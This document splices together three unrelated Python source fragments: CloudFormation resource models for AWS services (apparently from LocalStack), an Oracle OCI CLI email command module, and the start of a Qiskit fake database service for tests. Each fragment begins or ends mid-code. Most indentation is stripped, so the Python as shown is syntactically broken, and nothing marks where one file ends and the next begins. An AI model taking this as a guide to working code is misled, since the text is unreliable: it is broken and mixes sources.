m['EventSourceArn'] == source_arn and m['FunctionArn'] == aws_stack.lambda_function_arn(resource_id),
mappings['EventSourceMappings']))
if not mapping:
raise Exception('ResourceNotFound')
return mapping[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('UUID')
class LambdaPermission(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::Permission'
def fetch_state(self, stack_name, resources):
props = self.props
func_name = self.resolve_refs_recursively(stack_name, props.get('FunctionName'), resources)
func_arn = aws_stack.lambda_function_arn(func_name)
return self.do_fetch_state(func_name, func_arn)
def do_fetch_state(self, resource_name, resource_arn):
iam = aws_stack.connect_to_service('iam')
props = self.props
policy_name = LAMBDA_POLICY_NAME_PATTERN % resource_name
policy_arn = aws_stack.policy_arn(policy_name)
policy = iam.get_policy(PolicyArn=policy_arn)['Policy']
version = policy.get('DefaultVersionId')
policy = iam.get_policy_version(PolicyArn=policy_arn, VersionId=version)['PolicyVersion']
statements = policy['Document']['Statement']
statements = statements if isinstance(statements, list) else [statements]
principal = props.get('Principal')
existing = [s for s in statements if s['Action'] == props['Action'] and
s['Resource'] == resource_arn and
(not principal or s['Principal'] in [principal, {'Service': principal}, {'Service': [principal]}])]
return existing[0] if existing else None
def get_physical_resource_id(self, attribute=None, **kwargs):
# return statement ID here to indicate that the resource has been deployed
return self.props.get('Sid')
@staticmethod
def get_deploy_templates():
def lambda_permission_params(params, **kwargs):
result = select_parameters('FunctionName', 'Action', 'Principal')(params, **kwargs)
result['StatementId'] = short_uid()
return result
return {
'create': {
'function': 'add_permission',
'parameters': lambda_permission_params
}
}
class LambdaEventInvokeConfig(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::EventInvokeConfig'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('lambda')
props = self.props
result = client.get_function_event_invoke_config(
FunctionName=props.get('FunctionName'), Qualifier=props.get('Qualifier', '$LATEST'))
return result
def get_physical_resource_id(self, attribute=None, **kwargs):
props = self.props
return 'lambdaconfig-%s-%s' % (props.get('FunctionName'), props.get('Qualifier'))
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'put_function_event_invoke_config'
},
'delete': {
'function': 'delete_function_event_invoke_config',
'parameters': {
'FunctionName': 'FunctionName',
'Qualifier': 'Qualifier'
}
}
}
class ElasticsearchDomain(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Elasticsearch::Domain'
def get_physical_resource_id(self, attribute=None, **kwargs):
domain_name = self._domain_name()
if attribute == 'Arn':
return aws_stack.elasticsearch_domain_arn(domain_name)
return domain_name
def fetch_state(self, stack_name, resources):
domain_name = self._domain_name()
domain_name = self.resolve_refs_recursively(stack_name, domain_name, resources)
return aws_stack.connect_to_service('es').describe_elasticsearch_domain(DomainName=domain_name)
def _domain_name(self):
return self.props.get('DomainName') or self.resource_id
class FirehoseDeliveryStream(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::KinesisFirehose::DeliveryStream'
def fetch_state(self, stack_name, resources):
stream_name = self.props.get('DeliveryStreamName') or self.resource_id
stream_name = self.resolve_refs_recursively(stack_name, stream_name, resources)
return aws_stack.connect_to_service('firehose').describe_delivery_stream(DeliveryStreamName=stream_name)
class KinesisStream(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Kinesis::Stream'
def get_physical_resource_id(self, attribute=None, **kwargs):
return aws_stack.kinesis_stream_arn(self.props.get('Name'))
def fetch_state(self, stack_name, resources):
stream_name = self.resolve_refs_recursively(stack_name, self.props['Name'], resources)
result = aws_stack.connect_to_service('kinesis').describe_stream(StreamName=stream_name)
return result
class KinesisStreamConsumer(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Kinesis::StreamConsumer'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('ConsumerARN')
def fetch_state(self, stack_name, resources):
props = self.props
stream_arn = self.resolve_refs_recursively(stack_name, props['StreamARN'], resources)
result = aws_stack.connect_to_service('kinesis').list_stream_consumers(StreamARN=stream_arn)
result = [r for r in result['Consumers'] if r['ConsumerName'] == props['ConsumerName']]
return (result or [None])[0]
@staticmethod
def get_deploy_templates():
return {
'create': {
'function': 'register_stream_consumer'
},
'delete': {
'function': 'deregister_stream_consumer'
}
}
class Route53RecordSet(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Route53::RecordSet'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('Name') # Ref attribute is the domain name itself
def fetch_state(self, stack_name, resources):
route53 = aws_stack.connect_to_service('route53')
props = self.props
result = route53.list_resource_record_sets(HostedZoneId=props['HostedZoneId'])['ResourceRecordSets']
result = [r for r in result if r['Name'] == props['Name'] and r['Type'] == props['Type']]
return (result or [None])[0]
@staticmethod
def get_deploy_templates():
def param_change_batch(params, **kwargs):
attr_names = ['Name', 'Type', 'SetIdentifier', 'Weight', 'Region', 'GeoLocation',
'Failover', 'MultiValueAnswer', 'TTL', 'ResourceRecords', 'AliasTarget', 'HealthCheckId']
attrs = select_attributes(params, attr_names)
alias_target = attrs.get('AliasTarget', {})
alias_target['EvaluateTargetHealth'] = alias_target.get('EvaluateTargetHealth', False)
return {
'Comment': params.get('Comment', ''),
'Changes': [{
'Action': 'CREATE',
'ResourceRecordSet': attrs
}]
}
return {
'create': {
'function': 'change_resource_record_sets',
'parameters': {
'HostedZoneId': 'HostedZoneId',
'ChangeBatch': param_change_batch
}
}
}
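# Worked example (invented values): given params such as
# {'HostedZoneId': 'Z123', 'Name': 'api.example.com.', 'Type': 'A',
#  'TTL': 300, 'ResourceRecords': [...]}, param_change_batch selects the
# record-set attributes and wraps them in a single CREATE change:
#   {'Comment': '', 'Changes': [{'Action': 'CREATE',
#     'ResourceRecordSet': {'Name': 'api.example.com.', 'Type': 'A',
#                           'TTL': 300, 'ResourceRecords': [...]}}]}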
class SFNStateMachine(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::StepFunctions::StateMachine'
def get_resource_name(self):
return self.props.get('StateMachineName')
def fetch_state(self, stack_name, resources):
sm_name = self.props.get('StateMachineName') or self.resource_id
sm_name = self.resolve_refs_recursively(stack_name, sm_name, resources)
sfn_client = aws_stack.connect_to_service('stepfunctions')
state_machines = sfn_client.list_state_machines()['stateMachines']
sm_arn = [m['stateMachineArn'] for m in state_machines if m['name'] == sm_name]
if not sm_arn:
return None
result = sfn_client.describe_state_machine(stateMachineArn=sm_arn[0])
return result
def update_resource(self, new_resource, stack_name, resources):
props = new_resource['Properties']
client = aws_stack.connect_to_service('stepfunctions')
sm_arn = self.props.get('stateMachineArn')
if not sm_arn:
self.state = self.fetch_state(stack_name=stack_name, resources=resources)
sm_arn = self.state['stateMachineArn']
kwargs = {
'stateMachineArn': sm_arn,
'definition': props['DefinitionString'],
}
return client.update_state_machine(**kwargs)
class SFNActivity(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::StepFunctions::Activity'
def fetch_state(self, stack_name, resources):
activity_arn = self.physical_resource_id
if not activity_arn:
return None
client = aws_stack.connect_to_service('stepfunctions')
result = client.describe_activity(activityArn=activity_arn)
return result
class IAMRole(GenericBaseModel, MotoRole):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::Role'
def get_resource_name(self):
return self.props.get('RoleName')
def fetch_state(self, stack_name, resources):
role_name = self.resolve_refs_recursively(stack_name, self.props.get('RoleName'), resources)
return aws_stack.connect_to_service('iam').get_role(RoleName=role_name)['Role']
def update_resource(self, new_resource, stack_name, resources):
props = new_resource['Properties']
client = aws_stack.connect_to_service('iam')
return client.update_role(RoleName=props.get('RoleName'), Description=props.get('Description') or '')
class IAMPolicy(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::Policy'
def fetch_state(self, stack_name, resources):
return IAMPolicy.get_policy_state(self, stack_name, resources, managed_policy=False)
@classmethod
def get_deploy_templates(cls):
def _create(resource_id, resources, resource_type, func, stack_name, *args, **kwargs):
iam = aws_stack.connect_to_service('iam')
props = resources[resource_id]['Properties']
cls.resolve_refs_recursively(stack_name, props, resources)
policy_doc = json.dumps(remove_none_values(props['PolicyDocument']))
policy_name = props['PolicyName']
for role in props.get('Roles', []):
iam.put_role_policy(RoleName=role, PolicyName=policy_name, PolicyDocument=policy_doc)
for user in props.get('Users', []):
iam.put_user_policy(UserName=user, PolicyName=policy_name, PolicyDocument=policy_doc)
for group in props.get('Groups', []):
iam.put_group_policy(GroupName=group, PolicyName=policy_name, PolicyDocument=policy_doc)
return {}
return {'create': {'function': _create}}
@staticmethod
def get_policy_state(obj, stack_name, resources, managed_policy=False):
def _filter(pols):
return [p for p in pols['AttachedPolicies'] if p['PolicyName'] == policy_name]
iam = aws_stack.connect_to_service('iam')
props = obj.props
policy_name = props.get('PolicyName') or props.get('ManagedPolicyName')
result = {}
roles = props.get('Roles', [])
users = props.get('Users', [])
groups = props.get('Groups', [])
if managed_policy:
result['policy'] = iam.get_policy(PolicyArn=aws_stack.policy_arn(policy_name))
for role in roles:
role = obj.resolve_refs_recursively(stack_name, role, resources)
policies = (_filter(iam.list_attached_role_policies(RoleName=role)) if managed_policy else
iam.get_role_policy(RoleName=role, PolicyName=policy_name))
result['role:%s' % role] = policies
for user in users:
user = obj.resolve_refs_recursively(stack_name, user, resources)
policies = (_filter(iam.list_attached_user_policies(UserName=user)) if managed_policy else
iam.get_user_policy(UserName=user, PolicyName=policy_name))
result['user:%s' % user] = policies
for group in groups:
group = obj.resolve_refs_recursively(stack_name, group, resources)
policies = (_filter(iam.list_attached_group_policies(GroupName=group)) if managed_policy else
iam.get_group_policy(GroupName=group, PolicyName=policy_name))
result['group:%s' % group] = policies
result = {k: v for k, v in result.items() if v}
return result or None
class IAMManagedPolicy(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::ManagedPolicy'
def get_physical_resource_id(self, attribute=None, **kwargs):
return aws_stack.policy_arn(self.props['ManagedPolicyName'])
def fetch_state(self, stack_name, resources):
return IAMPolicy.get_policy_state(self, stack_name, resources, managed_policy=True)
@classmethod
def get_deploy_templates(cls):
def _create(resource_id, resources, resource_type, func, stack_name, *args, **kwargs):
iam = aws_stack.connect_to_service('iam')
resource = resources[resource_id]
props = resource['Properties']
cls.resolve_refs_recursively(stack_name, props, resources)
policy_doc = json.dumps(props['PolicyDocument'])
policy = iam.create_policy(PolicyName=props['ManagedPolicyName'], PolicyDocument=policy_doc)
policy_arn = policy['Policy']['Arn']
for role in resource.get('Roles', []):
iam.attach_role_policy(RoleName=role, PolicyArn=policy_arn)
for user in resource.get('Users', []):
iam.attach_user_policy(UserName=user, PolicyArn=policy_arn)
for group in resource.get('Groups', []):
iam.attach_group_policy(GroupName=group, PolicyArn=policy_arn)
return {}
return {'create': {'function': _create}}
class GatewayResponse(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::GatewayResponse'
def fetch_state(self, stack_name, resources):
props = self.props
api_id = self.resolve_refs_recursively(stack_name, props['RestApiId'], resources)
if not api_id:
return
client = aws_stack.connect_to_service('apigateway')
result = client.get_gateway_response(restApiId=api_id, responseType=props['ResponseType'])
return result if 'responseType' in result else None
class GatewayRequestValidator(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::RequestValidator'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('id')
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('apigateway')
props = self.props
api_id = self.resolve_refs_recursively(stack_name, props['RestApiId'], resources)
name = self.resolve_refs_recursively(stack_name, props['Name'], resources)
result = client.get_request_validators(restApiId=api_id).get('items', [])
result = [r for r in result if r.get('name') == name]
return result[0] if result else None
# services/email/src/oci_cli_email/generated/email_cli.py
# coding: utf-8
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved.
from __future__ import print_function
import click
import oci # noqa: F401
import six # noqa: F401
import sys # noqa: F401
from oci_cli.cli_root import cli
from oci_cli import cli_constants # noqa: F401
from oci_cli import cli_util
from oci_cli import json_skeleton_utils
from oci_cli import custom_types # noqa: F401
from oci_cli.aliasing import CommandGroupWithAlias
@cli.command(cli_util.override('email_root_group.command_name', 'email'), cls=CommandGroupWithAlias, help=cli_util.override('email_root_group.help', """API for the Email Delivery service. Use this API to send high-volume, application-generated
emails. For more information, see [Overview of the Email Delivery Service](/iaas/Content/Email/Concepts/overview.htm).
**Note:** Write actions (POST, UPDATE, DELETE) may take several minutes to propagate and be reflected by the API. If a subsequent read request fails to reflect your changes, wait a few minutes and try again.
"""), short_help=cli_util.override('email_root_group.short_help', """Email Delivery API"""))
@cli_util.help_option_group
def email_root_group():
pass
@click.command(cli_util.override('sender_group.command_name', 'sender'), cls=CommandGroupWithAlias, help="""The full information representing an approved sender.""")
@cli_util.help_option_group
def sender_group():
pass
@click.command(cli_util.override('suppression_group.command_name', 'suppression'), cls=CommandGroupWithAlias, help="""The full information representing an email suppression.""")
@cli_util.help_option_group
def suppression_group():
pass
email_root_group.add_command(sender_group)
email_root_group.add_command(suppression_group)
@sender_group.command(name=cli_util.override('change_sender_compartment.command_name', 'change-compartment'), help=u"""Moves a sender into a different compartment. When provided, If-Match is checked against ETag values of the resource.""")
@cli_util.option('--sender-id', required=True, help=u"""The unique OCID of the sender.""")
@cli_util.option('--compartment-id', required=True, help=u"""The [OCID] of the compartment into which the sender should be moved.""")
@cli_util.option('--if-match', help=u"""Used for optimistic concurrency control. In the update or delete call for a resource, set the `if-match` parameter to the value of the etag from a previous get, create, or update response for that resource. The resource will be updated or deleted only if the etag you provide matches the resource's current etag value.""")
@json_skeleton_utils.get_cli_json_input_option({})
@cli_util.help_option
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={})
@cli_util.wrap_exceptions
def change_sender_compartment(ctx, from_json, sender_id, compartment_id, if_match):
if isinstance(sender_id, six.string_types) and len(sender_id.strip()) == 0:
raise click.UsageError('Parameter --sender-id cannot be whitespace or empty string')
kwargs = {}
if if_match is not None:
kwargs['if_match'] = if_match
kwargs['opc_request_id'] = cli_util.use_or_generate_request_id(ctx.obj['request_id'])
details = {}
details['compartmentId'] = compartment_id
client = cli_util.build_client('email', ctx)
result = client.change_sender_compartment(
sender_id=sender_id,
change_sender_compartment_details=details,
**kwargs
)
cli_util.render_response(result, ctx)
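# Example invocation of the command defined above (hypothetical OCIDs):
#   oci email sender change-compartment \
#       --sender-id ocid1.emailsender.oc1..example \
#       --compartment-id ocid1.compartment.oc1..example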
@sender_group.command(name=cli_util.override('create_sender.command_name', 'create'), help=u"""Creates a sender for a tenancy in a given compartment.""")
@cli_util.option('--compartment-id', required=True, help=u"""The OCID of the compartment that contains the sender.""")
@cli_util.option('--email-address', required=True, help=u"""The email address of the sender.""")
@cli_util.option('--freeform-tags', type=custom_types.CLI_COMPLEX_TYPE, help=u"""Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags]. Example: `{\"Department\": \"Finance\"}`""" + custom_types.cli_complex_type.COMPLEX_TYPE_HELP)
@cli_util.option('--defined-tags', type=custom_types.CLI_COMPLEX_TYPE, help=u"""Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags]. Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`""" + custom_types.cli_complex_type.COMPLEX_TYPE_HELP)
@cli_util.option('--wait-for-state', type=custom_types.CliCaseInsensitiveChoice(["CREATING", "ACTIVE", "DELETING", "DELETED"]), help="""This operation creates, modifies or deletes a resource that has a defined lifecycle state. Specify this option to perform the action and then wait until the resource reaches a given lifecycle state. If timeout is reached, a return code of 2 is returned. For any other error, a return code of 1 is returned.""")
@cli_util.option('--max-wait-seconds', type=click.INT, help="""The maximum time to wait for the resource to reach the lifecycle state defined by --wait-for-state. Defaults to 1200 seconds.""")
@cli_util.option('--wait-interval-seconds', type=click.INT, help="""Check every --wait-interval-seconds to see whether the resource has reached the lifecycle state defined by --wait-for-state. Defaults to 30 seconds.""")
@json_skeleton_utils.get_cli_json_input_option({'freeform-tags': {'module': 'email', 'class': 'dict(str, string)'}, 'defined-tags': {'module': 'email', 'class': 'dict(str, dict(str, object))'}})
@cli_util.help_option
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={'freeform-tags': {'module': 'email', 'class': 'dict(str, string)'}, 'defined-tags': {'module': 'email', 'class': 'dict(str, dict(str, object))'}}, output_type={'module': 'email', 'class': 'Sender'})
@cli_util.wrap_exceptions
def create_sender(ctx, from_json, wait_for_state, max_wait_seconds, wait_interval_seconds, compartment_id, email_address, freeform_tags, defined_tags):
kwargs = {}
kwargs['opc_request_id'] = cli_util.use_or_generate_request_id(ctx.obj['request_id'])
details = {}
details['compartmentId'] = compartment_id
details['emailAddress'] = email_address
if freeform_tags is not None:
details['freeformTags'] = cli_util.parse_json_parameter("freeform_tags", freeform_tags)
if defined_tags is not None:
details['definedTags'] = cli_util.parse_json_parameter("defined_tags", defined_tags)
client = cli_util.build_client('email', ctx)
result = client.create_sender(
create_sender_details=details,
**kwargs
)
if wait_for_state:
if hasattr(client, 'get_sender') and callable(getattr(client, 'get_sender')):
try:
wait_period_kwargs = {}
if max_wait_seconds is not None:
wait_period_kwargs['max_wait_seconds'] = max_wait_seconds
if wait_interval_seconds is not None:
wait_period_kwargs['max_interval_seconds'] = wait_interval_seconds
click.echo('Action completed. Waiting until the resource has entered state: {}'.format(wait_for_state), file=sys.stderr)
result = oci.wait_until(client, client.get_sender(result.data.id), 'lifecycle_state', wait_for_state, **wait_period_kwargs)
except oci.exceptions.MaximumWaitTimeExceeded as e:
# If we fail, we should show an error, but we should still provide the information to the customer
click.echo('Failed to wait until the resource entered the specified state. Outputting last known resource state', file=sys.stderr)
cli_util.render_response(result, ctx)
sys.exit(2)
except Exception:
click.echo('Encountered error while waiting for resource to enter the specified state. Outputting last known resource state', file=sys.stderr)
cli_util.render_response(result, ctx)
raise
else:
click.echo('Unable to wait for the resource to enter the specified state', file=sys.stderr)
cli_util.render_response(result, ctx)
@suppression_group.command(name=cli_util.override('create_suppression.command_name', 'create'), help=u"""Adds recipient email addresses to the suppression list for a tenancy. Addresses added to the suppression list via the API are denoted as \"MANUAL\" in the `reason` field. *Note:* All email addresses added to the suppression list are normalized to include only lowercase letters.""")
@cli_util.option('--compartment-id', required=True, help=u"""The OCID of the compartment to contain the suppression. Since suppressions are at the customer level, this must be the tenancy OCID.""")
@cli_util.option('--email-address', required=True, help=u"""The recipient email address of the suppression.""")
@json_skeleton_utils.get_cli_json_input_option({})
@cli_util.help_option
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={}, output_type={'module': 'email', 'class': 'Suppression'})
@cli_util.wrap_exceptions
def create_suppression(ctx, from_json, compartment_id, email_address):
kwargs = {}
kwargs['opc_request_id'] = cli_util.use_or_generate_request_id(ctx.obj['request_id'])
details = {}
details['compartmentId'] = compartment_id
details['emailAddress'] = email_address
client = cli_util.build_client('email', ctx)
result = client.create_suppression(
create_suppression_details=details,
**kwargs
)
cli_util.render_response(result, ctx)
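# Example invocation of the command defined above (hypothetical OCID;
# suppressions live at the tenancy level, so the tenancy OCID is passed):
#   oci email suppression create \
#       --compartment-id ocid1.tenancy.oc1..example \
#       --email-address blocked@example.com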
@sender_group.command(name=cli_util.override('delete_sender.command_name', 'delete'), help=u"""Deletes an approved sender for a tenancy in a given compartment for a provided `senderId`.""")
@cli_util.option('--sender-id', required=True, help=u"""The unique OCID of the sender.""")
@cli_util.option('--if-match', help=u"""Used for optimistic concurrency control. In the update or delete call for a resource, set the `if-match` parameter to the value of the etag from a previous get, create, or update response for that resource. The resource will be updated or deleted only if the etag you provide matches the resource's current etag value.""")
@cli_util.confirm_delete_option
@cli_util.option('--wait-for-state', type=custom_types.CliCaseInsensitiveChoice(["CREATING", "ACTIVE", "DELETING", "DELETED"]), help="""This operation creates, modifies or deletes a resource that has a defined lifecycle state. Specify this option to perform the action and then wait until the resource reaches a given lifecycle state. If timeout is reached, a return code of 2 is returned. For any other error, a return code of 1 is returned.""")
@cli_util.option('--max-wait-seconds', type=click.INT, help="""The maximum time to wait for the resource to reach the lifecycle state defined by --wait-for-state. Defaults to 1200 seconds.""")
@cli_util.option('--wait-interval-seconds', type=click.INT, help="""Check every --wait-interval-seconds to see whether the resource has reached the lifecycle state defined by --wait-for-state. Defaults to 30 seconds.""")
@json_skeleton_utils.get_cli_json_input_option({})
@cli_util.help_option
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={})
@cli_util.wrap_exceptions
def delete_sender(ctx, from_json, wait_for_state, max_wait_seconds, wait_interval_seconds, sender_id, if_match):
if isinstance(sender_id, six.string_types) and len(sender_id.strip()) == 0:
raise click.UsageError('Parameter --sender-id cannot be whitespace or empty string')
kwargs = {}
if if_match is not None:
kwargs['if_match'] = if_match
kwargs['opc_request_id'] = cli_util.use_or_generate_request_id(ctx.obj['request_id'])
client = cli_util.build_client('email', ctx)
result = client.delete_sender(
sender_id=sender_id,
**kwargs
)
if wait_for_state:
if hasattr(client, 'get_sender') and callable(getattr(client, 'get_sender')):
try:
wait_period_kwargs = {}
if max_wait_seconds is not None:
wait_period_kwargs['max_wait_seconds'] = max_wait_seconds
if wait_interval_seconds is not None:
wait_period_kwargs['max_interval_seconds'] = wait_interval_seconds
click.echo('Action completed. Waiting until the resource has entered state: {}'.format(wait_for_state), file=sys.stderr)
oci.wait_until(client, client.get_sender(sender_id), 'lifecycle_state', wait_for_state, succeed_on_not_found=True, **wait_period_kwargs)
except oci.exceptions.ServiceError as e:
# We make an initial service call so we can pass the result to oci.wait_until(), however if we are waiting on the
# outcome of a delete operation it is possible that the resource is already gone and so the initial service call
# will result in an exception that reflects a HTTP 404. In this case, we can exit with success (rather than raising
# the exception) since this would have been the behaviour in the waiter anyway (as for delete we provide the argument
# succeed_on_not_found=True to the waiter).
#
# Any non-404 should still result in the exception being thrown.
if e.status == 404:
pass
else:
raise
except oci.exceptions.MaximumWaitTimeExceeded as e:
# If we fail, we should show an error, but we should still provide the information to the customer
click.echo('Failed to wait until the resource entered the specified state. Please retrieve the resource to find its current state', file=sys.stderr)
cli_util.render_response(result, ctx)
sys.exit(2)
except Exception:
click.echo('Encountered error while waiting for resource to enter the specified state. Outputting last known resource state', file=sys.stderr)
cli_util.render_response(result, ctx)
raise
else:
click.echo('Unable to wait for the resource to enter the specified state', file=sys.stderr)
cli_util.render_response(result, ctx)
@suppression_group.command(name=cli_util.override('delete_suppression.command_name', 'delete'), help=u"""Removes a suppressed recipient email address from the suppression list for a tenancy in a given compartment for a provided `suppressionId`.""")
<reponame>QuantumHardware/qiskit-experiments
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Fake service class for tests."""
from typing import Optional, List, Dict, Type, Any, Union, Tuple, Callable
import functools
import json
from datetime import datetime, timedelta
import uuid
from qiskit_experiments.test.fake_backend import FakeBackend
from qiskit_experiments.database_service import DatabaseServiceV1
from qiskit_experiments.database_service.device_component import DeviceComponent
from qiskit_experiments.database_service.exceptions import (
DbExperimentEntryExists,
DbExperimentEntryNotFound,
)
# Check if PANDAS package is installed
try:
import pandas as pd
HAS_PANDAS = True
except ImportError:
pd = None
HAS_PANDAS = False
def requires_pandas(func: Callable) -> Callable:
"""Function decorator for functions requiring Pandas.
Args:
func: a function requiring Pandas.
Returns:
The decorated function.
Raises:
        ImportError: If Pandas is not installed.
"""
@functools.wraps(func)
def decorated_func(*args, **kwargs):
if not HAS_PANDAS:
            raise ImportError(
                f"The pandas python package is required for {func}. "
                "You can install it with 'pip install pandas'."
            )
return func(*args, **kwargs)
return decorated_func
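# Illustrative usage of the decorator above, a minimal sketch. `summary_frame`
# is a hypothetical function, not part of the original module; calling it
# without pandas installed raises ImportError via the wrapper:
#
#   @requires_pandas
#   def summary_frame(records):
#       return pd.DataFrame(records)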
class FakeService(DatabaseServiceV1):
"""
    This extremely simple database is designed for testing and as a playground for developers.
It does not support multi-threading.
It is not guaranteed to perform well for a large amount of data.
It implements most of the methods of `DatabaseService`.
"""
@requires_pandas
def __init__(self):
self.exps = pd.DataFrame(
columns=[
"experiment_type",
"backend_name",
"metadata",
"experiment_id",
"parent_id",
"job_ids",
"tags",
"notes",
"share_level",
"start_datetime",
"device_components",
"figure_names",
"backend",
]
)
self.results = pd.DataFrame(
columns=[
"experiment_id",
"result_data",
"result_type",
"device_components",
"tags",
"quality",
"verified",
"result_id",
"chisq",
"creation_datetime",
"service",
"backend_name",
]
)
def create_experiment(
self,
experiment_type: str,
backend_name: str,
metadata: Optional[Dict] = None,
experiment_id: Optional[str] = None,
parent_id: Optional[str] = None,
job_ids: Optional[List[str]] = None,
tags: Optional[List[str]] = None,
notes: Optional[str] = None,
json_encoder: Type[json.JSONEncoder] = json.JSONEncoder,
**kwargs: Any,
) -> str:
if experiment_id is None:
            experiment_id = str(uuid.uuid4())
if experiment_id in self.exps.experiment_id.values:
raise DbExperimentEntryExists("Cannot add experiment with existing id")
# Clarifications about some of the columns:
# share_level - not a parameter of `DatabaseService.create_experiment` but a parameter of
# `IBMExperimentService.create_experiment`. It must be supported because it is used
# in `DbExperimentData`.
        # device_components - the user specifies the device components when adding a result
# (this is not a local decision of the fake service but the interface of DatabaseService
# and IBMExperimentService). The components of the different results of the same
# experiment are aggregated here in the device_components column.
# start_datetime - not a parameter of `DatabaseService.create_experiment` but a parameter of
# `IBMExperimentService.create_experiment`. Since `DbExperimentData` does not set it
# via kwargs (as it does with share_level), the user cannot control the time and the
# service alone decides about it. Here we've chosen to set a unique time for each
# experiment, with the first experiment dated to midnight of January 1st, 2022, the
# second experiment an hour later, etc.
# figure_names - the fake service currently does not support figures. The column
# (degenerated to []) is required to prevent a flaw in the work with DbExperimentData.
# backend - the query methods `experiment` and `experiments` are supposed to return an
        # instantiated backend object, and not only the backend name. We assume that the fake
# service works with the fake backend (class FakeBackend).
self.exps = pd.concat(
[
self.exps,
pd.DataFrame(
[
{
"experiment_type": experiment_type,
"experiment_id": experiment_id,
"parent_id": parent_id,
"backend_name": backend_name,
"metadata": metadata,
"job_ids": job_ids,
"tags": tags,
"notes": notes,
"share_level": kwargs.get("share_level", None),
"device_components": [],
"start_datetime": datetime(2022, 1, 1)
+ timedelta(hours=len(self.exps)),
"figure_names": [],
"backend": FakeBackend(backend_name),
}
],
columns=self.exps.columns,
),
],
ignore_index=True,
)
return experiment_id
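    # Illustrative usage, a minimal sketch (the experiment type and backend name
    # are placeholders, not values from this source):
    #
    #   service = FakeService()
    #   exp_id = service.create_experiment("qv", backend_name="fake_backend")
    #
    # The first experiment is stamped datetime(2022, 1, 1) and each subsequent
    # one lands an hour later, per the start_datetime convention described above.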
def update_experiment(
self,
experiment_id: str,
metadata: Optional[Dict] = None,
job_ids: Optional[List[str]] = None,
notes: Optional[str] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
if experiment_id not in self.exps.experiment_id.values:
raise DbExperimentEntryNotFound("Attempt to update a non-existing experiment")
row = self.exps.experiment_id == experiment_id
if metadata is not None:
self.exps.loc[row, "metadata"] = metadata
if job_ids is not None:
self.exps.loc[row, "job_ids"] = job_ids
if tags is not None:
self.exps.loc[row, "tags"] = tags
if notes is not None:
self.exps.loc[row, "notes"] = notes
for field_name in ["share_level", "parent_id"]:
if field_name in kwargs:
self.exps.loc[row, field_name] = kwargs[field_name]
def experiment(
self, experiment_id: str, json_decoder: Type[json.JSONDecoder] = json.JSONDecoder
) -> Dict:
if experiment_id not in self.exps.experiment_id.values:
raise DbExperimentEntryNotFound("Experiment does not exist")
return self.exps.loc[self.exps.experiment_id == experiment_id].to_dict("records")[0]
def experiments(
self,
limit: Optional[int] = 10,
json_decoder: Type[json.JSONDecoder] = json.JSONDecoder,
device_components: Optional[Union[str, DeviceComponent]] = None,
experiment_type: Optional[str] = None,
backend_name: Optional[str] = None,
tags: Optional[List[str]] = None,
parent_id: Optional[str] = None,
tags_operator: Optional[str] = "OR",
**filters: Any,
) -> List[Dict]:
df = self.exps
if experiment_type is not None:
df = df.loc[df.experiment_type == experiment_type]
if backend_name is not None:
df = df.loc[df.backend_name == backend_name]
# Note a bug in the interface for all services:
# It is impossible to filter by experiments whose parent id is None
# (i.e., root experiments)
if parent_id is not None:
df = df.loc[df.parent_id == parent_id]
# Waiting for consistency between provider service and qiskit-experiments service,
# currently they have different types for `device_components`
if device_components is not None:
raise ValueError(
"The fake service currently does not support filtering on device components"
)
if tags is not None:
if tags_operator == "OR":
df = df.loc[df.tags.apply(lambda dftags: any(x in dftags for x in tags))]
elif tags_operator == "AND":
df = df.loc[df.tags.apply(lambda dftags: all(x in dftags for x in tags))]
else:
raise ValueError("Unrecognized tags operator")
# These are parameters of IBMExperimentService.experiments
if "start_datetime_before" in filters:
df = df.loc[df.start_datetime <= filters["start_datetime_before"]]
if "start_datetime_after" in filters:
df = df.loc[df.start_datetime >= filters["start_datetime_after"]]
# This is a parameter of IBMExperimentService.experiments
sort_by = filters.get("sort_by", "start_datetime:desc")
if not isinstance(sort_by, list):
sort_by = [sort_by]
# TODO: support also experiment_type
if len(sort_by) != 1:
raise ValueError("The fake service currently supports only sorting by start_datetime")
sortby_split = sort_by[0].split(":")
# TODO: support also experiment_type
if (
len(sortby_split) != 2
or sortby_split[0] != "start_datetime"
or (sortby_split[1] != "asc" and sortby_split[1] != "desc")
):
raise ValueError(
